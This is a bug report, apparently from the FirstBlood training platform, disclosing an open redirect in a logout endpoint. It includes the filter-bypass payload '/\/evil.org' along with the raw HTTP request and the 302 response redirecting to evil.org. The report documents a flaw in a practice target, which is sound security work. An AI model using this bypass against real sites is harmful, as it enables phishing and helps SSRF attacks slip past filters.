FirstBlood-#92 — Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php
This issue was discovered on FirstBlood v1.0.0
On 2021-05-10, 0xconft reported:
I found an open redirect on your website at /drpanel/logout.php endpoint on ref parameter. There's filter in place where it must start with / and also // is filtered but i end up bypassing this with this payload "/\/evil.org" which will be reflected as "//evil.org" at location header thus will redirect victim to evil.org. An example of impact caused by this vulnerability is this vulnerability can be combined with SSRF attack to bypassing filter or it can be used for phising.
GET /drpanel/logout.php?ref=/\/evil.org HTTP/1.1 Host: firstbloodhackers.com:49330 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://firstbloodhackers.com:49330/drpanel/index.php Cookie: drps=5a5cfb7c6047d6dc8dbc411b2 Upgrade-Insecure-Requests: 1
HTTP/1.1 302 Found Server: nginx Date: Mon, 10 May 2021 06:19:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: //evil.org Content-Length: 0
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.